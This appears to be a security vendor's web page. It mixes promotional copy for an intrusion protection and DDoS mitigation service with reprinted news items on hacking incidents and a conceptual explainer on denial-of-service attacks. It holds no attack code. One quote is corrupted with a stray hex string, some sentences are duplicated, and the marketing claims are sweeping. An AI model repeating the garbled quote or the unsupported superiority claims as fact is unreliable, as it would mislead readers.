ACCOUNT
PASSWORD
  • GUIDE
    •
  • SOLUTIONS
    •
  • STORE
    •
  • PRICING
    •
  • CONTACT
    •
  • LIBRARY
    •
  • TARGETS
    •
  • AUDITS
    •
    Founded in 1997, and headquartered in Toronto, Ontario, Canada, Securimetric is a Canadian company which focuses on security convergence and integrated network centric solutions. We deliver security consulting and disaster recovery services to clients in need of serious protection for enterprise systems. We ensure your security investments yield bottom-line results. Our flagship Intrusion Protection System delivers cost-effective securification of enterprise networks against existing and emergent threats. The Securimetric® Intrusion Protection System is the first product on the market offering protection for both physical and information assets . the foundation of an effective integrated security infrastructure. The Securimetric IPS manages DNS, SMTP, HTTP and other traffic of interest. Beyond mere detection, the Securimetric IPS is capable of intelligent response to intrusion attempts -- following evasive attackers across the network and adjusting dynamically system configuration to eliminate points of vulnerability. A wide array of plug-in component modules are available, fully customizing the Securimetric® Intrusion Protection System to meet specific operator requirements. All components are available for purchase or lease. We ensure your security investments yield bottom-line results. The Securimetric® IPS suite delivers a complete information security infrastructure, offering the most advanced security assurance capabilities available anywhere, at any price. Securimetric® backs up our IPS technology with no-nonsense security consulting and disaster recovery services. Securimetric's security professionals use proven methods to assess current systems, policies and capabilities. The other guys don't even come close, and we'll prove it with a free security probe.

    CIA CLAIMS HACKERS ATTACKING POWER GRID
    Criminals have been able to hack into computer systems via the Internet and cut power to several cities, a U.S. Central Intelligence Agency analyst said this week.

    Speaking at a conference of security professionals on Wednesday, CIA analyst Tom Donahue disclosed the recently declassified attacks while offering few specifics on what actually went wrong.

    Criminals have launched online attacks that disrupted power equipment in several regions outside of the U.S., he said, without identifying the countries affected. The goal of the attacks was extortion, he said.

    "We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands," he said in a statement posted to the Web on Friday by the conference's organizers, the SANS Institute. "In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."

    "According to Mr. Donahue, the CIA actively and thoroughly considered the benefits and risks of making this information public, and came down on the side of disclosure," SANS said in the statement.

    One conference attendee said the disclosure came as news to many of the government and industry security professionals in attendance. "It appeared that there were a lot of people who didn't know this already," said the attendee, who asked not to be identified because he is not authorized to speak with the press.

    He confirmed SANS' report of the talk. "There were apparently a couple of incidents where extortionists cut off power to several cities using some sort of attack on the power grid, and it does not appear to be a physical attack," he said.

    Hacking the power grid made front-page headlines in September when CNN aired a video showing an Idaho National Laboratory demonstration of a software attack on the computer system used to control a power generator. In the demonstration, the smoking generator was rendered inoperable.

    The U.S. is taking steps to lock down the computers that manage its power systems, however.

    On Thursday, the Federal Energy Regulatory Commission (FERC) approved new mandatory standards designed to improve cybersecurity.

    CIA representatives could not be reached immediately for comment.

    0.7.6-4
    The ICMP sensors now store historical data which can be graphed. Packet loss is now detected.

    AMAZON EC2 DOWN
    Cloud computing is all very well until someone trips over a wire and the whole thing goes dark.

    Reddit, Foursquare and Quora were among the sites affected by Amazon Web Services suffering network latency and connectivity errors this morning, according to the company’s own status dashboard.

    Amazon says performance issues affected instances of its Elastic Compute Cloud (EC2) service and its Relational Database Service, and it’s “continuing to work towards full resolution”. These are hosted in its North Virginia data centre.

    SPAMMERS ARE ABUSING XSS HOLES VIA GOOGLE
    Hackers have turned their attention to search engines in the latest attempt to invade the computers of unsuspecting Web users.

    In the past few weeks, they have taken advantage of Web pages that incorrectly use JavaScript, a computer language used in features like interactive maps, to infect thousands of sites. The altered sites show up in a Google search, and when clicked on, redirect the user to a malicious program that aims to steal information.

    One goal is to infect users' computers, possibly by installing a device to capture keystrokes, and therefore passwords and other sensitive information.

    Seven out of 10 Web sites are vulnerable to these flaws, according to WhiteHat Security in Santa Clara. It's unclear, however, how widespread the problem is because many users don't realize they've been infected.

    Google is working on a filter that will find and automatically block such malicious Web addresses, a spokesman said Tuesday. In the meantime, it has been contacting affected organizations to advise them on how to fix their sites' vulnerabilities.

    In the latest attacks, which occurred last week, hackers planted malicious search terms in Web addresses along with popular search words so the sites would be ranked high in Google searches.

    One site that was infected, the TalkingBiz blog run by the University of North Carolina in Chapel Hill, tried to get visitors to download malicious code from a site hosted in American Samoa that has since been taken down. The location of the site does not indicate the location of the hackers, however.

    The university said it doesn't know how the site was infected or who is responsible for the attack.

    Among the retail victims named Friday were Wal-Mart, Target, Sears and Bloomingdale's, according to an independent security consultant, Dancho Danchev, who has been blogging about the attacks from the Netherlands since the beginning of March.

    The attacks were also reported by several security vendors and the Internet Storm Center at SANS, a group of researchers in Bethesda, Md.

    Wal-Mart, Target and Sears said they were aware of the attacks. Wal-Mart said that its site had not been affected and that it protects customers from "fraudulent online activity." Target said that it works with Amazon, which provides Target's Web infrastructure, to protect customers and that there is no risk to customers who visit Target.com. Sears said it is "taking the appropriate steps to ensure the Web site's security." Bloomingdale's was not available for comment.

    Media targets named by Danchev include USAToday, ABCNews, Forbes.com and News.com. USAToday reported on the attacks on Monday.

    Mass Web attacks were also reported in mid-March by Websense, a security vendor in San Diego that filters Web sites for corporations. Hackers were probing Web pages looking for vulnerabilities to an attack that allowed the hackers to get into and make changes to any SQL server databases behind the vulnerable sites, said Charles Renert, senior director of advanced content research.

    DISGRUNTLED EMPLOYEE REMOTELY DISABLES CARS
    Austin police arrested Omar Ramos-Lopez, 20, on Wednesday, charging him with felony breach of computer security.

    Ramos-Lopez used a former colleague's password to deactivate starters and set off car horns, police said. Several car owners said they had to call tow trucks and were left stranded at work or home.

    Police say Ramos-Lopez, fired from a Texas auto dealership, used an Internet service to remotely disable ignitions and set off car horns of more than 100 vehicles sold at his former workplace.

    "He caused these customers, now victims, to miss work," Austin police spokeswoman Veneza Aguinaga said. "They didn't get paid. They had to get tow trucks. They didn't know what was going on with their vehicles."

    Ramos-Lopez was in the Travis County Jail on Wednesday with bond set at $3,000.

    The Texas Auto Center dealership in Austin installs GPS devices that can prevent cars from starting.

    The system is used to repossess cars when buyers are overdue on payments, said Jeremy Norton, a controller at the dealership where Ramos-Lopez worked. Car horns can be activated when repo agents go to collect vehicles and believe the owners are hiding them.

    "We are taking extra measures to make sure this never happens again," Norton said.

    Starting in mid-February, dealership employees noticed unusual changes to their business records. Someone was going into the system and changing customers' names, such as having dead rapper Tupac Shakur buying a 2009 vehicle, Norton said.

    Soon, customers began calling saying their cars wouldn't start, or that their horns were going off incessantly, forcing them to disengage the battery. Norton said the dealership originally thought the cars had mechanical problems.

    Then employees noticed someone had ordered $130,000 in parts and equipment from the company that makes the GPS devices.

    Police said they were able to trace the sabotage to Ramos-Lopez's computer, leading to his arrest.

    Norton said Ramos-Lopez didn't seem unusually upset about being fired.

    "I think he thought what he was doing was a harmless prank," Norton said. "He didn't see the ramifications of it."

    That's what you get for leaving your car open to remote exploitation. These guys use the devices to get more money out of people, now they have seen that technology is a two-way street. Think about that next time you let a third party remotely control your vehicle.

    GOOGLE THREATENS TO BACK OUT OF CHINA
    Google said that it would stop cooperating with Chinese Internet censorship and consider shutting down its operations in the country altogether, citing assaults from hackers on its computer systems and China’s attempts to “limit free speech on the Web.”

    The move, if followed through, would be a highly unusual rebuke of China by one of the largest and most admired technology companies, which had for years coveted China’s 300 million Web users.

    Since arriving here in 2006 under an arrangement with the government that purged its Chinese search results of banned topics, Google has come under fire for abetting a system that increasingly restricts what citizens can read online.

    Google linked its decision to sophisticated cyberattacks on its computer systems that it suspected originated in China and that were aimed, at least in part, at the Gmail user accounts of Chinese human rights activists.

    Those attacks, which Google said took place last week, were directed at some 34 companies or entities, most of them in Silicon Valley, California, according to people with knowledge of Google’s investigation into the matter. The attackers may have succeeded in penetrating elaborate computer security systems and obtaining crucial corporate data and software source codes, though Google said it did not itself suffer losses of that kind.

    While the scope of the hacking and the motivations and identities of the hackers remained uncertain, Google’s response amounted to an unambiguous repudiation of its own five-year courtship of the vast China market, which most major multinational companies consider crucial to their growth prospects. It is also likely to enrage the Chinese authorities, who deny that they censor the Internet and are accustomed to having major foreign companies adapt their practices to Chinese norms.

    The company said it would try to negotiate a new arrangement to provide uncensored results on its search site, google.cn. But that is a highly unlikely prospect in a country that has the most sweeping Web filtering system in the world. Google said it would otherwise cease to run google.cn and would consider shutting its offices in China, where it employs some 700 people, many of them highly compensated software engineers, and has an estimated $300 million in annual revenue.

    Google executives declined to discuss in detail their reasons for overturning their China strategy. But despite a costly investment, the company has a much smaller share of the search market here than it does in other major markets, commanding only about one in three searches by Chinese. The leader in searches, Baidu, is a Chinese-run company that enjoys a close relationship with the government.

    Google executives have privately fretted for years that the company’s decision to censor the search results on google.cn, to filter out topics banned by Chinese censors, was out of sync with the company’s official motto, “Don’t be evil.”

    “We have decided we are no longer willing to continue censoring our results on google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all,” David Drummond, senior vice president for corporate development and the chief legal officer, said in a statement.

    Wenqi Gao, a spokesman for the Chinese Consulate in New York, said he did not see any problems with google.cn. “I want to reaffirm that China is committed to protecting the legitimate rights and interests of foreign companies in our country,” he said in a phone interview.

    In China, search requests that include words like “Tiananmen Square massacre” or “Dalai Lama” come up blank. In recent months, the government has also blocked YouTube, Google’s video-sharing service.

    While Google’s business in China is now small, analysts say that the country could soon become one of the most lucrative Internet and mobile markets, and a withdrawal would significantly reduce Google’s long-term growth.

    “The consequences of not playing the China market could be very big for any company, but particularly for an Internet company that makes its money from advertising,” said David B. Yoffie, a Harvard Business School professor. Mr. Yoffie said advertising played an even bigger role in the Internet in China than it did in the United States. At the time of its arrival, the company said that it believed that the benefits of its presence in China outweighed the downside of being forced to censor some search results here, as it would provide more information and openness to Chinese citizens. The company, however, has repeatedly said that it would monitor restrictions in China.

    Google’s announcement Tuesday drew praise from free speech and human rights advocates, many of whom had criticized the company in the past over its decision to enter the Chinese market despite censorship requirements.

    “I think it’s both the right move and a brilliant one,” said Jonathan Zittrain, a legal scholar at Harvard’s Berkman Center for Internet and Society.

    IP4 ADDRESS SPACE HIJACKING
    "Where we find evidence that there has been a fraudulent transfer we will try to go back through history and find out who has the earliest established legitimate use of the address space."

    --ARIN President Ray Plzak

    Recently an expanse of Internet address space belonging to the County of Los Angeles was put to some uses that had little to do with effective municipal governance. Some county addresses inexplicably began hosting porn websites, while others generated suspicious scanning activity that tripped intrusion detection systems around the net. And then there was the spam, suddenly oozing from the county's cyberspace like sludge moving down the Los Angeles river after a rain -- low-interest mortgages, bargain ink jet cartridges, an abundance of "sizzling teens" in adult situations.

    It turns out the official records of the address block had been doctored, and L.A. County no longer owned the space -- at least as far as the rest of the world was concerned. All 65,534 addresses now belonged to one Emil Kacperski, the 20-something owner of a small unincorporated hosting company in Northern California. No one was more surprised than county officials, who'd been using the space on an internal county-wide network since 1995. "We found out when we got a call from some outfit overseas, saying they were being hacked and they investigated the IP address and it was one of ours," says Dennis Shelley, associate CIO for the county. "We followed up on it, and we found out that it had been hijacked."

    Los Angeles County had been hit by a growing type of hi-tech fraud, in which large, and usually dormant, segments of the Internet's address space are taken away from their registered users through an elaborate shell game of forged letters, ephemeral domain names and anonymous corporate fronts. The patsies in the scheme are the four non-profit registries that parcel out address space around the world and keep track of who's using it. The prizes are the coveted "Class B" or "/16" (read "slash-sixteen") address blocks that Internet authorities passed out like candy in the days when address space was bountiful, but are harder to get legitimately now.

    The most rapacious consumers of the stolen address space are spammers trying to stay a step ahead of anti-spam blacklists. A /16 provides a lot of addresses to hide behind, a lot of launch pads for unwanted e-mail, squats for hastily-erected spamvertised websites, and attack points from which one can scan the Internet for misconfigured proxy servers-- useful for laundering even more spam. Some anti-spam investigators believe an underground economy exists in which a large block of address space is broken down and re-sold in smaller chunks like a boosted Acura in a chop-shop. "Money is changing hands," says Kai Schlichting, a veteran network engineer who tracks down stolen IP space in his spare time. "I wouldn't be surprised if you could sell a /16 for $100,000 in bits and pieces."

    Hijacking an IP block is cheap, and it bypasses conservation measures imposed by the regional registries: to get a large allocation legally, one must first demonstrate an immediate need for the space; it's not enough to want it. Then you have to pay the registry as much as $10,000 in fees. In contrast, to snake someone else's domain all the scamster has to do is write a letter on fake company letterhead changing the contact information for the allocation, or in some circumstances just forge an e-mail message from the owner. Investigators say that some hijackers have resorted to cloning an entire company by incorporating under a similar name.

    Kacperski, owner of the Walnut Creek, Calif. hosting company Atrivo, says he acquired L.A. County's space after becoming frustrated by the cost and bureaucracy of getting a larger block through approved channels. In a telephone interview, the entrepreneur admitted that the /16 wasn't his, but he denied taking it himself. He says he purchased it from a gray-market broker he met online, who claimed to have the right to sell the block.

    "He called it 'borrowed space,'" says Kacperski. "We ended up paying the person for the block and he ended up [transfering] it to us... He assured us there'd be no problems." The price, he claims, was a paltry $500, transferred through PayPal, though he was instructed to use only a tiny fraction of the space.

    Regardless of who stole it, Los Angeles County quickly got its space back. But elsewhere the scam has intensified in recent months, with at least seven large allocations found newly-diverted, and countless other cases suspected. Last month anti-spam groups and concerned network operators formed a private mailing list to investigate the phenomenon outside the view of cyberjackers. "There's anything up to 100 of these blocks out there on the loose," estimates Richard Cox, an IT forensics guru with Mandarin Technology in the U.K. "That's the magnitude that we're dealing with here."

    Network operators were galvanized by a particularly brazen case in April, when a trail of spam led to the discovery that no-less than six /16s -- nearly 400,000 addresses -- had been misappropriated from Trafalgar House, a British construction and shipping conglomerate that's now part of Aker Kvaerner, headquartered in Norway. From the U.K., Cox discovered that the perpetrators conned the American Registry for Internet Numbers (ARIN) into changing the contact information for the space. One of the /16s was traced to a Dutch spammer, and the other five to a mysterious company called "Fedfinancial Corp."

    Fedfinancial managed to convince ARIN that it had been contracted to provide network management services for Trafalgar. ARIN won't say exactly how it was swindled, but registration records show the grifters had an authentic-looking e-mail address at a newly-minted "traf-infosystems.net" domain, and a genuine street address with matching voice and fax telephone numbers. But the phone numbers ring to Nevada and Offshore Business Formation, a company that sets up corporations for a fee, and takes orders over the Web. Public records show that they incorporated Fedfinancial as a Nevada corporation last January, on behalf of an unnamed client. The street address is also theirs.

    ARIN president Ray Plzak says the registry doesn't comment on specific cases, but acknowledged that address space hijacking is a problem. "We have measures in place to detect these kinds of things, and we have a set of procedures that we follow to verify information, and we're continuously looking into ways of improving that" says Plzak. "No procedure is ever 100 0xbfc16f30erfect, and we recognize that."

    Once the ARIN record for a block of space has been tweaked, the new "owner" can show it to a network access provider as proof that he has the right to use the addresses. Kacperski found three providers for his purloined L.A. County block; anyone who questioned his sudden good fortune was treated to a tall tale about an old friend who bequeathed Kacperski the mammoth space when his company went bankrupt.

    Coincidentally, one of the providers, New York-based networking firm nLayer, also wound up routing a /16 that another customer took from the Italian logistics firm Zust-Ambrosetti in January. But nLayer insists it's doing everything reasonable to avoid harboring misappropriated space. "Obviously we don't want to be routing any IP blocks that are potentially stolen." says an nLayer representative who identified himself as Richard Steenbergen. "But nothing really shows up as a red flag when someone is listed as a contact on the block."

    Anti-spammers argue that access providers should be more skeptical when someone comes in with a ridiculously large allocation. "If it's a customer connecting with T1 and walking in with a /16, or two or three of them, this is something that should set off some alarm bells," says Schlichting. But additional vigilance goes against an access provider's financial interest -- they make money by connecting people, not by turning them away.

    And until spammers discovered the technique, IP hijacking was largely considered a dishonest but forgivable path to acquiring old, unused address space belonging to defunct companies. The perpetrators were what the Spamhaus Project describes as "a few crufty geeks" in search of "cheap digs." The scam is victimless in that it normally targets dormant allocations that are otherwise going to waste, in many cases taking blocks of space that belong to defunct companies, or, like the Trafalgar House space, have long faded from corporate memory.

    But like the mob moving in on a neighborhood poker game, spammers have turned a once-harmless misdemeanor into an organized and well-funded scheme. Internet defenders shudder at the thought of large portions of the net's real-estate under the control of anonymous rogue entities. "There's no accountability. You don't know who really owns this particular address space. You have no way of finding out," says Schlichting." Some even worry that malefactors will go a step further, and begin hijacking address space that's already in active use. "This whole episode has identified huge weaknesses in the Internet's own infrastructure," says Cox. "What we've seen happen is trivial compared to what we've seen possible."

    For now, attention is turning to what the regional registries could or should do to stop the practice, and ARIN has begun reviewing old records for signs of chicanery. "Where we find evidence that there has been a fraudulent transfer... we will remove that information and try to go back through history, if you will, and try and find out who has the earliest established legitimate use of the address space," says Plzak. What that history might yield has some network operators nervous; some of the space appropriated by those "crufty geeks" has been stratified into legitimacy by the passage of time. This week network operators on the NANOG mailing list began debating whether benevolent squatters should be granted some kind of amnesty from the coming "witch hunt."

    As for Kacperski, last week he received approval from ARIN for a new block of space that he can rightfully call his own. "There are forms, there are a lot of procedures, and we had to pay $2,500... This is not an easy thing to do," he says. His new block is a /20, which means he has a little over 4,000 IP addresses for his hosting company. That's not bad, but it's a long fall from the heady days when he had enough virtual real estate to serve the City of Angeles.

    BIG-TIME CREDIT CARD HACKER BUSTED
    Albert Gonzalez will spend 15 to 25 years in prison for masterminding one of the two largest identity thefts in U.S. history.

    According to a plea agreement announced today, he will plead guilty by Sept. 11 to 19 counts in Massachusetts related to the theft of 41 million credit-card numbers from retailers TJX Cos, BJ's Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21 and DSW.

    The plea deal resolves related charges in federal court in New York.

    But the 28-year-old former government informant from Miami, who is in jail already, still faces federal charges in New Jersey for allegedly being the mastermind of a separate case involving the theft of 130 million credit and debit card numbers from from credit-card processor Heartland Payment Systems and retail chains 7-Eleven and Hannaford Brothers Co. He and two unidentified Russians were indicted Aug. 17 on those charges.

    DNA EVIDENCE CAN BE FAKED
    Scientists have shown it is possible to fake DNA evidence, potentially undermining the credibility of the key forensic technique.

    Using equipment found in labs up and down the country, they obliterated all traces of DNA from a blood sample and added someone else's genetic material in its place.

    The swap was so successful it fooled scientists who carry out DNA fingerprinting for U.S. courts.

    The development raises the possibility of samples of blood or saliva being planted at crime scenes, leading to the innocent being wrongly convicted and the guilty going free.

    Israeli researcher Dan Frumkin, who produced the bogus DNA, said: 'If you can fake blood, saliva or any other tissue, you can engineer a crime scene. Any biology undergraduate could perform this.'

    Dr Frumkin's company, which has made a kit he claims can distinguish real DNA samples from fake ones, used two techniques to fabricate the evidence.

    In the first, they extracted minute samples of genetic material from strands of hair and multiplied them many times over.

    They then inserted this DNA into blood cells that had been purged of all genetic clues to their real owner.

    The blood then contained the genetic fingerprint of the first person, the journal Forensic Science International: Genetics reports.

    In theory, it could then be planted at the scene of a crime.

    DNA material can be gathered from an empty wine glass or cigarette butts.

    Hair, chewing gum, cigarette butts and mugs and glasses could all provide an initial DNA sample.

    The company has also developed a more complicated technique, which relies on knowledge of the DNA fingerprint - a 'bar code' of genetics from 20 set spots on a person's DNA.

    The scientists built a 'library' containing hundreds of DNA snippets covering all the genetic codes that crop up at the set points scrutinised by police. To make a sample matching a particular fingerprint, they just dipped into their library for the right combination and mixed them in a test-tube.

    The researchers believe eventually the technology will be used by criminals.

    They warned: 'DNA evidence is key to the conviction or exoneration of suspects of various types of crime, from theft to rape and murder. However, the disturbing possibility that DNA evidence can be faked has been overlooked.

    DENIAL-OF-SERVICE ATTACKS
    A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. The term is generally used with regards to computer networks, but is not limited to this field, for example, it is also used in reference to CPU resource management.

    One of the most frightening things that can happen to a server is to be hit with a Distributed Denial of Service (DDoS) attack. For the company, organization, or individual responsible for the website or multiple sites being victimized, it can generate a feeling of helplessness. Although there may not be much you can do to avoid becoming the target of such an attack, there are steps you can take to prevent the likelihood that your server will be brought to its knees.

    DDoS is a specific type of Denial of Service (DoS) attack, often aimed at large websites and networks. A regular DoS attack involves one computer or server attacking another, flooding it with more requests than it can handle, and effectively crippling it.

    A DDoS attack is called "distributed" because it involves multiple attacking machines, sometimes hundreds or even thousands. Multiple remote systems will flood the bandwidth or resources of the target, making it difficult to pinpoint any one machine as the source attacker. In most cases, the owners of the attacking machines are not even aware that they are being used to attack a server. The attack software is distributed using malware, such as trojans or botnets. Unlike a normal DoS attack, a DDoS does not have to use spoofed ip addresses, since the attacking machines are real, legitimate hosts.

    Many types of intrusions and malware attacks are random and not usually directed specifically at the victim. They are crimes of circumstance. With DDoS attacks, the intent is very specific, and the victim is carefully targeted. For this reason, the victim servers are usually owned by high profile corporations and organizations, and the attackers often have political, economical, or social agendas. Most importantly, these attacks do not have an end game. There is no technical goal they seek to achieve. Instead, most DDoS attacks are designed simply to send a message to the target.

    A recently publicized DDoS case involved an attack on the United States Copyright office, an attack which took down "copyright.gov". The attackers, known simply as "Anonymous", have also attacked the RIAA website and other sites with interest in fighting against copyright infringement. The attacks corresponded with the shutdown of Lime Wire, a popular file-sharing service.

    There have also been recent publicized DDOS attacks that were direct extortion attempts.

    Anyone with an Internet-connected server could become the target of a DDoS. Because just about anyone can have an agenda against a website of any kind, you cannot assume that your server will be immune to attacks. Any Internet-connected machine, including servers and home computers can also be used as "agents" to deliver the attacks. Finally, industry and public infrastructure may be affected, since it is usually large sites, governments, and corporations that come under attack.

    Protecting the interests of your clients and customers is very important. If you have large enterprise servers, it may be worth it to hire a network security consultant to make sure your server is as secure as possible.

    Unfortunately, when someone decides to attack your server, there may be little you can do to stop them. In such cases, the best you can do is to try to limit the damage they are able to do, gather evidence against them, and report them to law enforcement agencies. With careful prevention techniques in place, you can discourage attackers from targeting you when they see that attacks do not cause significant damage.

    One common method of attack involves saturating the target (victim) machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

    Denial-of-service attacks are considered violations of the IAB's Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.

    Securimetric has established peering connections with multiple core Internet Service Providers to provide multi-gigabit attack protection. Each peer is closely monitored and continously evaluated in order to deliver the fastest response time to customer's evaluated in order to deliver the fastest response time to customer's critical andlatency-sensitive applications.

    At Securimetric border, traffic is filtered for bandwidth flood using wire-speed Access Control Lists. Securimetric also keeps tracking lists of bogon IPs and infected hosts which are also filtered at this layer.

    At this level, protocol state such as TCP three-way handshake is verified. SYN ddos flood and other similar ddos attack attempts that do not conform to protocol standard are also filtered out. To mitigate spoofed attacks, Securimetric uses challenge-response algorithms like TCP SYN cookie and TCP SYN Authentication to distinguish between spoofed and legi timate traffic.

    Securimetric enforces both Statistical Analysis and Anomaly Recognition filtering for zero day attacks. Using tatistical Analysis, unusual number of packets or high traffic rate from zombie clients can be identified and filtered. Using Anomaly recognition, auto-learning of normal baselines for protocol and source networks flows can be used to identify and filter malicious activities.

    Securimetric prevent DDoS Mitigation system continously monitors application traffic for unusual pattern and behavior. Using its propretary pattern recognition and analysis system, Securimetric deters morphing HTTP flood attacks by adapting flexible-content filters to counter evasive intents rapidly.

    Securimetric deep packet inspection engine provides comprehensive application-layer intelligence, allowing Securimetric to understand what applications are running on the client's network to efficiently select and deter application traffic violations.

    With increasing number of attacks from larger-sized clients (or zombies) using valid established connections to overwhelm the system resources, Securimetric anti-zombie system mitigates such HTTP attacks by using a challenge response authentication process to differentiate between legitimate browsers and zombie programs that access the attacked site.

    To further mitigate application specific level attacks - HTTP attacks, Securimetric can enforce intelligent HTTP Malformed filtering to ensure the validity of HTTP transactions, and limit the number of connections or request to specific objects.

    Rate-limiting will be applied to further limit exploitation of system and bandwidth resources against baseline statistic.

    A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

    Malware can carry DDoS attack mechanisms; one of the better-known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack.

    A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

    Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

    These collections of systems compromisers are known as botnets. DDoS tools like stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification like smurf attacks and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes.

    Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a well distributed DDoS. These flood attacks do not require completion of the TCP three way handshake and attempt to exhaust the destination SYN queue or the server bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as syn cookies may be effective mitigation against SYN queue flooding, however complete bandwidth exhaustion may require involvement.

    Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion -- even against their business rivals.

    It is important to note the difference between a DDoS and DoS attack. If an attacker mounts an attack from a single host it would be classified as a DoS attack. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack.

    The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track down and shut down.

    These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines.

    "Pulsing" zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing it rather than crashing it. This type of attack, referred to as "degradation-of-service" rather than "denial-of-service", can be more difficult to detect than regular zombie invasions and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more damage than concentrated floods. Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the attacks really are attacks or just healthy and likely desired increases in website traffic.

    Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.

    Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

    A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.
     
     
    SECURE SITE | CONTACT US | STORE | TERMS OF SERVICE | NOC | OPERATIONS

    Copyright © Securimetric Corporation. All rights reserved.